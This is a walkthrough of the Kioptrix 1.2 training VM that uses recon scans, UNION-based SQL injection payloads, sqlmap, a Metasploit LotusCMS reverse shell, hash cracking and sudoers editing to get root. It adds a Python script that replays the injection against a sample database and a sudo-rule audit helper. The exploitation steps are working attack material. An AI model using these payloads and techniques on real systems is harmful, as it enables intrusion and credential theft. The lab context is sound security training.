Part 3 of the Kioptrix series. The Kioptrix VMs are intended for anyone who wants to start getting into pentesting, and they are similar to the VMs in the PWK course for those working towards the OSCP certification. The link to download the VM can be found here. Let's get started!!
Description from author:
It’s been a while since the last Kioptrix VM challenge. Life keeps getting in the way of these things you know.
After seeing the number of downloads for the last two, and the numerous videos showing ways to beat these challenges, I felt that 1.2 (or just level 3) needed to come out. Thank you to all that downloaded and played the first two. And thank you to the ones that took the time to produce video solutions of them. Greatly appreciated.
As with the other two, this challenge is geared towards the beginner. It is however different. Added a few more steps and a new skill set is required. Still being in the realm of the beginner I must add. The same as the others, there’s more than one way to “pwn” this one. There’s easy and not so easy. Remember… the sense of “easy” or “difficult” is always relative to one’s own skill level. I never said these things were exceptionally hard or difficult, but we all need to start somewhere. And let me tell you, making these vulnerable VMs is not as easy as it looks…
Important thing with this challenge. Once you find the IP (DHCP Client) edit your hosts file and point it to kioptrix3.com
Under Windows, you would edit C:\Windows\System32\drivers\etc\hosts to look something like this:
# localhost name resolution is handled within DNS itself.
# 127.0.0.1 localhost
# ::1 localhost
127.0.0.1 static3.cdn.ubi.com
Under Linux that would be /etc/hosts
There’s a web application involved, so to have everything nice and properly displayed you really need to do this.
Hope you enjoy Kioptrix VM Level 1.2 challenge.
MD5 Hash : d324ffadd8e3efc1f96447eec51901f2
Starting the pentest
Kali Linux machine
Using netdiscover, I found the victim VM at 192.168.182.153.
root@kali:~# netdiscover -i eth0 -r 192.168.182.0/24
Scanning and Reconnaissance
The nmap scan shows OpenSSH 4.7p1 Debian 8ubuntu1.2 on port 22/tcp and Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch) on port 80/tcp, and fingerprints the OS as Linux 2.6.X. With only SSH and an old Apache/PHP stack exposed, the way in is almost certainly through the web application.
root@kali:~# nmap -A -T4 192.168.182.153

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2017-03-02 00:00 CST
Nmap scan report for kioptrix3.com (192.168.182.153)
Host is up (0.00027s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey:
|   1024 30:e3:f6:dc:2e:22:5d:17:ac:46:02:39:ad:71:cb:49 (DSA)
|_  2048 9a:82:e6:96:e4:7e:d6:a6:d7:45:44:cb:19:aa:ec:dd (RSA)
80/tcp open  http    Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Ligoat Security - Got Goat? Security ...
MAC Address: 00:0C:29:58:63:15 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.27 ms kioptrix3.com (192.168.182.153)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.56 seconds
root@kali:~#
Running Nikto, I could see that the web server hosts phpMyAdmin, a free PHP tool for administering MySQL over the web (I smell an SQL injection later in the pentest). Nikto also flags the PHP and Apache versions as outdated and the HTTP TRACE method as enabled.
root@kali:~# nikto -host http://192.168.182.153/
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.182.153
+ Target Hostname:    192.168.182.153
+ Target Port:        80
+ Start Time:         2017-03-02 00:24:51 (GMT-6)
---------------------------------------------------------------------------
+ Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
+ Cookie PHPSESSID created without the httponly flag
+ Retrieved x-powered-by header: PHP/5.2.4-2ubuntu5.6
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ PHP/5.2.4-2ubuntu5.6 appears to be outdated (current is at least 5.6.9). PHP 5.5.25 and 5.4.41 are also current.
+ Apache/2.2.8 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Server leaks inodes via ETags, header found with file /favicon.ico, inode: 631780, size: 23126, mtime: Fri Jun  5 14:22:00 2009
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3092: /phpmyadmin/changelog.php: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpmyadmin/: phpMyAdmin directory found
+ OSVDB-3092: /phpmyadmin/Documentation.html: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ 7534 requests: 0 error(s) and 19 item(s) reported on remote host
+ End Time:           2017-03-02 00:25:05 (GMT-6) (14 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
root@kali:~#
I first went to the site and found out it was a blog. I already knew it had phpmyadmin because of the nikto scan, but I also found out it had a gallery.
After browsing the site a bit, I went to “Ligoat Press Room”, clicked through the sorting options and a photo id, and noticed that the URL carries an id parameter, a classic place to look for SQL injection. Tampering with that value (the usual first probe is a single quote appended to it, gallery.php?id=1') made the server return an SQL error. This site is vulnerable to SQL injection!!
The last thing I checked was the login portal on the blog, which showed that the site runs LotusCMS, a version vulnerable to the LotusCMS 3.0 eval() Remote Command Execution exploit.
The exploitation is split into three parts: an SQL injection with sqlmap, the same SQL injection done manually, and the LotusCMS 3.0 eval() Remote Command Execution exploit. All three lead to the same result, the credentials of users on the VM, which are then used for privilege escalation to root.
SQLi using sqlmap
I will NOT be putting all the output from sqlmap! I did not want to dump so much info so i just showed the commands used and the important output. Just fyi! So now knowing that the web server is vulnerable to an SQL injection, I fired up sqlmap and ran the command below to enumerate DBMS databases.
root@kali:~# sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1" --dbs
Well 3 databases were available! I used the next command to see the tables on the gallery database.
root@kali:~# sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1" -p id --tables -D gallery
Now we see 7 tables in the gallery database. dev_accounts looks very interesting, so let's dump its rows with the command below and see what we find.
root@kali:~# sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1" -p id -T dev_accounts --dump
From the dump we get the usernames and password hashes for dreg and loneferret. Once the hashes are cracked we can SSH into the victim's machine with these credentials. (You can skip ahead to “Password Cracking using hashcat” unless you want to see the other methods I used to get the passwords.)
Next I will do the SQL injection manually instead of with sqlmap. I used a tutorial that helped me a great deal and which I recommend to you all, called Hacking website using SQL Injection - step by step guide. If you have questions about how and why I used a certain SQL statement, that tutorial explains it in more detail, or just leave me a comment.
So with that covered, let's get started! We know from checking the site earlier that it is vulnerable to SQL injection, so the next things to find out are how many columns the vulnerable query selects and which of them are rendered on the page. The payload below goes in the URL as the value of the id parameter (replace the 1 in gallery.php?id=1 with it).
-1 union select 1,2,3,4,5,6--
From the output we can tell that the query has 6 columns, and that columns 2 and 3 are the ones whose values the page prints, so only those positions can carry injected output (if you want to know more about how I got this, follow the link above). The leading -1 matches no real photo, which is what makes the UNION row the one displayed. Next I will find the database version. Since column 2 is reflected, the injected expression goes in that position. The payload below shows exactly how it's done!
-1 union select 1,version(),3,4,5,6--
The version string 5.0.51a identifies the backend as MySQL, so we know which SQL dialect to write and that the information_schema views are available (MySQL 5.0 and later). Now we need to find the tables in the current database and their names. We will inject the query listed below.
-1 union select 1,group_concat(table_name),3,4,5,6 from information_schema.tables where table_schema=database()--
Sweet! We have all the tables in the database, so let's look at dev_accounts, since that one looks the most interesting. I will inject the query listed below. Note: the CHAR(...) portion spells out dev_accounts as a sequence of ASCII codes, so the payload contains no quote characters; I used the HackBar tool to do the conversion.
-1 union select 1,group_concat(column_name),3,4,5,6 FROM information_schema.columns WHERE table_name=CHAR(100, 101, 118, 95, 97, 99, 99, 111, 117, 110, 116, 115)--
Almost done! Lets get the database to give us the username and password using the injection query below.
-1 union select 1,group_concat(username,0x3a,password),3,4,5,6 From dev_accounts--
Bingo!! We have the usernames and password hashes for dreg and loneferret. Now on to password cracking. (You can skip the next exploit if you want to continue with the pentest, or read the Lotus exploit to see another way of exploiting this VM.)
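To make the mechanics of the manual injection concrete, here is an added example (it is not code from the original write-up or from the gallery application) that replays the same UNION-based steps against a constructed stand-in: an in-memory SQLite database with a dev_accounts table and a handler that concatenates the id parameter into its query, the same defect gallery.php has. SQLite has no information_schema, version() or multi-argument group_concat, so the schema steps use sqlite_master, pragma_table_info and || instead; the MySQL payloads you would actually send to the VM are the ones shown above and are noted beside each step. The table layout, usernames and hashes are constructed sample data. A parameterized version of the handler is included to show the fix.

```python
import hashlib
import sqlite3

# Constructed sample data: two developer accounts with unsalted MD5 hashes,
# the hash type cracked later in the write-up with hashcat -m 0.
SAMPLE_ACCOUNTS = {"sample_dev1": "Summer2011", "sample_dev2": "letmein"}


def md5_hex(s):
    return hashlib.md5(s.encode()).hexdigest()


def build_db():
    """In-memory stand-in for the gallery database (constructed, not the VM's)."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE photos(id INTEGER, title TEXT, description TEXT,
                            filename TEXT, votes INTEGER, views INTEGER);
        INSERT INTO photos VALUES (1, 'Goat', 'Got goat?', 'goat.jpg', 3, 10);
        CREATE TABLE dev_accounts(id INTEGER, username TEXT, password TEXT);
    """)
    for i, (user, pw) in enumerate(SAMPLE_ACCOUNTS.items(), start=1):
        db.execute("INSERT INTO dev_accounts VALUES (?, ?, ?)", (i, user, md5_hex(pw)))
    return db


def gallery_vulnerable(db, photo_id):
    """The defect: the id parameter is pasted straight into the SQL text."""
    sql = ("SELECT id,title,description,filename,votes,views "
           f"FROM photos WHERE id={photo_id}")
    return db.execute(sql).fetchall()


def gallery_fixed(db, photo_id):
    """Hardened form: enforce the type, then bind the value as a parameter."""
    pid = int(photo_id)  # raises ValueError for anything but an integer
    return db.execute("SELECT id,title,description,filename,votes,views "
                      "FROM photos WHERE id=?", (pid,)).fetchall()


def render(rows):
    """The template prints only title and description (columns 2 and 3),
    which is why only those positions reflect injected output."""
    return [(r[1], r[2]) for r in rows]


def char_literal(s):
    """Spell a string as char(...) so the payload needs no quote characters
    (the conversion the write-up did with HackBar)."""
    return "char(" + ",".join(str(ord(c)) for c in s) + ")"


def find_column_count(page, max_cols=20):
    """Grow 'union select 1,2,...,n' until the DBMS stops rejecting the UNION.
    The leading -1 matches no real photo, so the UNION row is what gets shown."""
    for n in range(1, max_cols + 1):
        markers = ",".join(str(i) for i in range(1, n + 1))
        try:
            rows = page(f"-1 union select {markers}--")
        except sqlite3.OperationalError:  # column-count mismatch
            continue
        return n, rows
    raise RuntimeError("column count not found")


def union_payload(n, slot, expr, tail=""):
    """Place expr in position slot of an n-column UNION SELECT."""
    cols = [expr if i == slot else str(i) for i in range(1, n + 1)]
    return f"-1 union select {','.join(cols)}{tail}--"


def run_attack(db):
    """Replay the write-up's steps; the MySQL equivalent is noted per step."""
    page = lambda value: gallery_vulnerable(db, value)
    n, rows = find_column_count(page)
    reflected = [c for c in render(rows)[0] if isinstance(c, int)]
    slot = reflected[0]
    # MySQL: group_concat(table_name) from information_schema.tables where table_schema=database()
    tables = render(page(union_payload(n, slot, "group_concat(name)",
        f" from sqlite_master where type={char_literal('table')}")))[0][0]
    # MySQL: group_concat(column_name) from information_schema.columns where table_name=CHAR(...)
    columns = render(page(union_payload(n, slot, "group_concat(name)",
        " from pragma_table_info('dev_accounts')")))[0][0]
    # MySQL: group_concat(username,0x3a,password) from dev_accounts
    creds = render(page(union_payload(n, slot,
        "group_concat(username||char(58)||password)", " from dev_accounts")))[0][0]
    return {"columns_in_query": n, "reflected": reflected, "tables": tables,
            "dev_account_columns": columns, "creds": creds}


if __name__ == "__main__":
    db = build_db()
    for key, value in run_attack(db).items():
        print(f"{key}: {value}")
    try:
        gallery_fixed(db, "-1 union select 1,2,3,4,5,6--")
    except ValueError as err:
        print("fixed handler rejected the payload:", err)
```

Running it prints the column count, the reflected positions, the table and column names and the user:hash pairs, then shows the parameterized handler refusing the same payload. The fix is the type check plus the bound parameter together: binding alone would still accept a string where an integer is expected, and the type check alone is not a general defence for text parameters.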
LotusCMS 3.0 eval() Remote Command Execution Exploit
I will use a Metasploit module for the LotusCMS 3.0 eval() Remote Command Execution exploit to get a shell. Note that the module's URI option defaults to /lcms/, but on this VM the CMS lives at the web root, so it has to be set to /.
msf > use exploit/multi/http/lcms_php_exec
msf exploit(lcms_php_exec) > show options

Module options (exploit/multi/http/lcms_php_exec):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST                     yes       The target address
   RPORT    80               yes       The target port
   URI      /lcms/           yes       URI
   VHOST                     no        HTTP server virtual host

Exploit target:

   Id  Name
   --  ----
   0   Automatic LotusCMS 3.0

msf exploit(lcms_php_exec) > set RHOST 192.168.182.153
RHOST => 192.168.182.153
msf exploit(lcms_php_exec) > set payload generic/shell_reverse_tcp
payload => generic/shell_reverse_tcp
msf exploit(lcms_php_exec) > set LHOST 192.168.182.147
LHOST => 192.168.182.147
msf exploit(lcms_php_exec) > set URI /
URI => /
msf exploit(lcms_php_exec) > exploit

[*] Started reverse TCP handler on 192.168.182.147:4444
[*] Using found page param: /index.php?page=index
[*] Sending exploit ...
[*] Command shell session 1 opened (192.168.182.147:4444 -> 192.168.182.153:51095) at 2017-03-03 00:51:23 -0600

whoami
www-data
So we have a shell. Lets do some looking around.
pwd
/home/www/kioptrix3.com
ls -l
total 84
drwxrwxrwx  2 root root  4096 Apr 15  2011 cache
drwxrwxrwx  8 root root  4096 Apr 14  2011 core
drwxrwxrwx  8 root root  4096 Apr 14  2011 data
-rw-r--r--  1 root root 23126 Jun  5  2009 favicon.ico
drwxr-xr-x  7 root root  4096 Apr 14  2011 gallery
-rw-r--r--  1 root root 26430 Jan 21  2007 gnu-lgpl.txt
-rw-r--r--  1 root root   399 Feb 23  2011 index.php
drwxrwxrwx 10 root root  4096 Apr 14  2011 modules
drwxrwxrwx  3 root root  4096 Apr 14  2011 style
-rw-r--r--  1 root root   243 Aug  5  2010 update.php
The gallery directory looks interesting. (Note also that cache, core, data, modules and style are world-writable while owned by root, the kind of misconfiguration that lets a web shell be dropped into the document root.) Let's see what's in there.
ls -l gallery
total 156
drwxr-xr-x 2 root root  4096 Apr 12  2011 BACK
-rw-r--r-- 1 root root  3573 Oct 10  2009 db.sql
-rw-r--r-- 1 root root   252 Apr 12  2011 g.php
drwxr-xr-x 3 root root  4096 Apr 12  2011 gadmin
-rw-r--r-- 1 root root   214 Apr 12  2011 gallery.php
-rw-r--r-- 1 root root  1440 Apr 14  2011 gconfig.php
-rw-r--r-- 1 root root   297 Apr 12  2011 gfooter.php
-rw-r--r-- 1 root root 38771 Apr 12  2011 gfunctions.php
-rw-r--r-- 1 root root  1009 Apr 12  2011 gheader.php
-rw-r--r-- 1 root root   249 Apr 12  2011 index.php
-rw-r--r-- 1 root root 10340 Apr 12  2011 install.BAK
-rw-r--r-- 1 root root   212 Apr 12  2011 login.php
-rw-r--r-- 1 root root   213 Apr 12  2011 logout.php
-rw-r--r-- 1 root root   249 Apr 12  2011 p.php
drwxrwxrwx 2 root root  4096 Apr 12  2011 photos
-rw-r--r-- 1 root root   213 Apr 12  2011 photos.php
-rw-r--r-- 1 root root   219 Apr 12  2011 post_comment.php
-rw-r--r-- 1 root root   214 Apr 12  2011 profile.php
-rw-r--r-- 1 root root    87 Oct 10  2009 readme.html
-rw-r--r-- 1 root root   213 Apr 12  2011 recent.php
-rw-r--r-- 1 root root   215 Apr 12  2011 register.php
drwxr-xr-x 2 root root  4096 Apr 13  2011 scopbin
-rw-r--r-- 1 root root   213 Apr 12  2011 search.php
-rw-r--r-- 1 root root   216 Apr 12  2011 slideshow.php
-rw-r--r-- 1 root root   211 Apr 12  2011 tags.php
drwxr-xr-x 6 root root  4096 Apr 12  2011 themes
-rw-r--r-- 1 root root    56 Oct 10  2009 version.txt
-rw-r--r-- 1 root root   211 Apr 12  2011 vote.php
I snooped around until I found what we were looking for in gconfig.php: the MySQL credentials the gallery uses. They are the database root account, so they also log us into phpMyAdmin.
$GLOBALS["gallarific_mysql_server"] = "localhost";
$GLOBALS["gallarific_mysql_database"] = "gallery";
$GLOBALS["gallarific_mysql_username"] = "root";
$GLOBALS["gallarific_mysql_password"] = "fuckeyou";
I input the credentials to get into the phpmyadmin application.
I then go to the gallery database. Then click on the SQL tab and enter the SQL query below.
SELECT * FROM dev_accounts
We Now have the usernames and password hashes for dreg and loneferret!
Password Cracking using hashcat
With the two hashes saved one per line in hashes.txt, I started hashcat to crack them. The 32-character hex digests are raw MD5, so -m 0 is the mode to use; if you saved them as user:hash pairs straight from the dump, add --username so hashcat ignores the username part. The command is listed below.
root@kali:~# hashcat -m 0 hashes.txt /usr/share/wordlists/rockyou.txt
hashcat recovered both passwords: starwars and Mast3r!
Linux Privilege Escalation
Let's SSH into the victim's VM as loneferret. The RSA key fingerprint the host presents matches the one nmap reported earlier, which confirms we are talking to the scanned machine.
root@kali:~# ssh loneferret@kioptrix3.com
The authenticity of host 'kioptrix3.com (192.168.182.153)' can't be established.
RSA key fingerprint is 9a:82:e6:96:e4:7e:d6:a6:d7:45:44:cb:19:aa:ec:dd.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added 'kioptrix3.com,192.168.182.153' (RSA) to the list of known hosts.
loneferret@kioptrix3.com's password:
Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
Last login: Sat Apr 16 08:51:58 2011 from 192.168.1.106
loneferret@Kioptrix3:~$ ls
checksec.sh  CompanyPolicy.README
loneferret@Kioptrix3:~$
Let's check the CompanyPolicy.README file; that looks interesting! I also ran sudo -l and whereis ht for additional info, and then listed the permissions on the ht binary.
loneferret@Kioptrix3:~$ cat CompanyPolicy.README
Hello new employee,
It is company policy here to use our newly installed software for editing, creating and viewing files.
Please use the command 'sudo ht'.
Failure to do so will result in you immediate termination.

DG
CEO
loneferret@Kioptrix3:~$
loneferret@Kioptrix3:~$ sudo -l
User loneferret may run the following commands on this host:
    (root) NOPASSWD: !/usr/bin/su
    (root) NOPASSWD: /usr/local/bin/ht
loneferret@Kioptrix3:~$
loneferret@Kioptrix3:~$ whereis ht
ht: /usr/local/bin/ht
loneferret@Kioptrix3:~$ ls -l /usr/local/bin/ht
-rwsr-sr-x 1 root root 2072344 2011-04-16 07:26 /usr/local/bin/ht
loneferret@Kioptrix3:~$
So loneferret may run ht through sudo as root without a password, and the binary is also setuid root (the s bits in -rwsr-sr-x), so it runs as root either way. A root-privileged editor can open and rewrite any file on the system, including /etc/sudoers, which is all we need. The !/usr/bin/su entry is a sudoers exclusion and does nothing to prevent this, since another permitted command reaches the same privilege. So let's edit /etc/sudoers! Use the command listed below to start the ht editor, then press F3 and open /etc/sudoers.
loneferret@Kioptrix3:~$ sudo ht
Once /etc/sudoers is open, append /bin/sh to the loneferret entry, then press ALT+F to save and CTRL+Z to exit.
Now run the following for root access:
loneferret@Kioptrix3:~$ sudo /bin/sh
# id
uid=0(root) gid=0(root) groups=0(root)
# whoami
root
# hostname
Kioptrix3
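As an added example (not code from the write-up), here is a small triage helper that parses the sudo -l output shown above and flags rules that hand over the target user. It encodes the reasoning applied to ht: an editor or file writer running as root can rewrite /etc/sudoers, so such a rule is equivalent to root, and a '!' exclusion like !/usr/bin/su does not stop it. The sample text is copied from the output above; the list of dangerous command names is a hand-maintained assumption, not a complete catalogue, so extend it for the systems you audit.

```python
import re

# Copied from the 'sudo -l' output in the write-up above.
SAMPLE_SUDO_L = """\
User loneferret may run the following commands on this host:
    (root) NOPASSWD: !/usr/bin/su
    (root) NOPASSWD: /usr/local/bin/ht
"""

# Hand-maintained assumption, not a complete catalogue: basenames of commands
# that let the caller read or write arbitrary files, or spawn a shell, when
# run as the runas user. Any of these with (root) is equivalent to root.
EDITORS_AND_WRITERS = {"ht", "vi", "vim", "nano", "emacs", "tee", "cp", "dd"}
SHELLS = {"sh", "bash", "dash", "zsh", "su"}

# One rule line: "(runas) TAG: TAG: command [args]"
RULE_RE = re.compile(
    r"^\s*\((?P<runas>[^)]*)\)\s*"      # (root) or (ALL : ALL)
    r"(?P<tags>(?:[A-Z]+:\s*)*)"        # NOPASSWD:, SETENV:, ...
    r"(?P<cmd>\S.*?)\s*$")


def parse_sudo_l(text):
    """Turn the rule lines of 'sudo -l' into dicts; header lines are skipped."""
    rules = []
    for line in text.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue
        cmd = m.group("cmd")
        negated = cmd.startswith("!")
        path = cmd.lstrip("!").split()[0]  # drop any fixed arguments
        rules.append({
            "runas": m.group("runas").split(":")[0].strip(),
            "nopasswd": "NOPASSWD:" in m.group("tags"),
            "negated": negated,
            "path": path,
        })
    return rules


def assess(rules):
    """Return (path, finding) pairs for rules that hand over the runas user."""
    findings = []
    for r in rules:
        base = r["path"].rsplit("/", 1)[-1]
        pw = "without a password" if r["nopasswd"] else "with the user's password"
        if r["negated"]:
            findings.append((r["path"],
                "'!' exclusion: sudoers negations are not an effective denylist; "
                "they only matter if no other rule reaches the same privilege"))
        elif base in EDITORS_AND_WRITERS:
            findings.append((r["path"],
                f"editor/file writer runs as {r['runas']} {pw}: can rewrite "
                f"/etc/sudoers or any other file, equivalent to {r['runas']}"))
        elif base in SHELLS:
            findings.append((r["path"],
                f"shell runs as {r['runas']} {pw}: direct escalation"))
    return findings


if __name__ == "__main__":
    for path, why in assess(parse_sudo_l(SAMPLE_SUDO_L)):
        print(f"{path}: {why}")
```

On the sample input it reports both lines: the ht rule as a root-equivalent file writer and the su line as an exclusion that provides no protection. A rule for a harmless command such as /usr/bin/id produces no finding.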
This one was harder than the first two and took me a while to get root. It needed some basic SQL knowledge as well as some basic Linux privilege escalation techniques, but I got it done. If you have any feedback, leave a comment below. It only gets harder from here. On to the next one!